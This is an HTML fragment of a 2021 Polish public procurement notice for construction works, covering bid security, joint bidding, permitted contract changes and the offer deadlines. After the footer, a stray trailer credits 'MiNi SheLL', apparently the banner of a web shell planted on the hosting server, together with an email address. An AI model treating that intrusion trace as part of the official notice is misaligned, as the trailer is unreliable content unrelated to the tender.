wykluczeniu z<br/>postępowania i spełnianiu warunków udziału w postępowaniu Podmiotu udostępniającego<br/>zasoby - załącznik nr 2A do SWZ - jeżeli dotyczy6) pełnomocnictwo upoważniające do złożenia<br/>oferty (w przypadku, gdy oferta nie jest podpisywana przez osobę/osoby wynikającą z<br/>dokumentów rejestracyjnych lub w przypadku Wykonawców wspólnie ubiegających się o<br/>zamówienie) - jeśli dotyczy7) Wadium- oryginał gwarancji lub poręczenia, zgodnie z zapisami Działu 14 SWZ, w przypadku złożenia wadium w formie innej niż pieniądz <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Każdy Wykonawca zobowiązany jest zabezpieczyć swoją ofertę poprzez wniesienie wadium w wysokości: 2 000,00 zł (słownie: dwa tysiące złotych 0/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku ich<br/>oferta musi spełniać następujące wymagania:a) Wykonawcy wspólnie ubiegający się o<br/>udzielenia zamówienia muszą ustanowić Pełnomocnika do reprezentowania ich w postępowaniu<br/>o udzielenie zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o<br/>udzielenie zamówienia publicznego.b) Wypełniając formularz ofertowy, jak również inne<br/>dokumenty powołujące się na Wykonawcę, w miejscu przeznaczonym na dane Wykonawcy<br/>należy wpisać dane dotyczące Wykonawców ubiegających się wspólnie o zamówienie.c)<br/>Wymagane Oświadczenia i dokumenty należy złożyć zgodnie z wytycznymi SWZ.2. Wszelka<br/>korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.3. Wykonawcy wspólnie<br/>ubiegający się o zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed<br/>podpisaniem umowy o realizację zamówienia, są zobowiązani przedstawić Zamawiającemu<br/>umowę regulującą zasady współpracy pomiędzy nimi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany umowy wymagają zgody obu Stron i zachowania formy pisemnej pod<br/>rygorem nieważności.2. Zgodnie z art. 455 ust. 1 pkt 1 ustawy Prawo zamówień publicznych,<br/>Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w następujących<br/>przypadkach:1) Zmiana wynagrodzenia określonego w umowie, które może ulec zmianie:a. w<br/>przypadku zmiany stawki podatku VAT,b. w przypadkach określonych w art. 455 ust. 1 pkt. 3) i<br/>4) oraz ust. 2 ustawy2) Zmiana terminu wykonania - maksymalnie o liczbę dni odpowiadającą<br/>wstrzymaniu lub opóźnieniu w wykonywaniu robót, jedynie w następstwie: a. wystąpienia<br/>warunków geologicznych lub hydrogeologicznych odbiegających w sposób istotny od przyjętych<br/>w dokumentacji projektowej, b. występowania niewybuchów lub niewypałów i konieczności ich<br/>usunięcia,c. wystąpienia niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci,<br/>instalacji lub innych obiektów budowlanych i konieczności ich przesunięcia,d. wystąpienia<br/>odkryć archeologicznych uniemożliwiających wykonywanie robót geologicznych,e. działania siły<br/>natury, uznanej za stan klęski żywiołowej,f. konieczności wykonania robót dodatkowych/<br/>zmiennych, które będą niezbędne dla prawidłowej realizacji przedmiotu zamówienia,g.<br/>niemożności realizacji przedmiotu umowy, z powodu niedopuszczenia do wykonywania robót lub nakazu ich wstrzymania przez uprawniony organ, z przyczyn niezawinionych przez<br/>Wykonawcę.h. uzgodnień między Stronami dotyczącymi skrócenia terminu,i. zmian umowy<br/>dokonanych na podstawie art. 455 ust 2 Ustawy Pzp, skutkujących koniecznością wydłużenia<br/>terminu wykonania robót. 3) Sposobu wykonania przedmiotu umowy, jedynie w następstwie: a.<br/>stwierdzenia odbiegających w sposób istotny od przyjętych w Dokumentacji technicznej<br/>warunków geologicznych lub hydrogeologicznych, które mogą skutkować niewykonaniem lub<br/>nienależytym wykonaniem przedmiotu umowy,b. stwierdzenia odbiegających w sposób istotny<br/>od przyjętych w Dokumentacji technicznej warunków terenu budowy, w szczególności<br/>wystąpienia nie zinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych<br/>urządzeń i obiektów budowlanych,3. Nie stanowi zmiany Umowy:a. Zmiana danych związanych<br/>z obsługą administracyjno-organizacyjną Umowy (np. zmiana rachunku bankowego),b. Zmiana<br/>danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami,c. Zmiana<br/>adresu/siedziby Zamawiającego/Wykonawcy.4. Zmiana osób uprawnionych do kierowania<br/>robotami może nastąpić w przypadku:a. zdarzeń losowych niezależnych od Wykonawcy,b. utraty<br/>uprawnień przez wskazane przez Wykonawcę osoby.5. W przypadku zmiany osób Wykonawca<br/>winien przedstawić Zamawiającemu uzasadnienie konieczności zmiany osób, które zostały<br/>wskazane w ofercie Wykonawcy i spełniających wymagania opisane w specyfikacji istotnych<br/>warunków zamówienia.6. Wymienione powyższe możliwości wprowadzenia zmian są<br/>uprawnieniem, a nie obowiązkiem Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-15 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-15 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-14</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-31 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com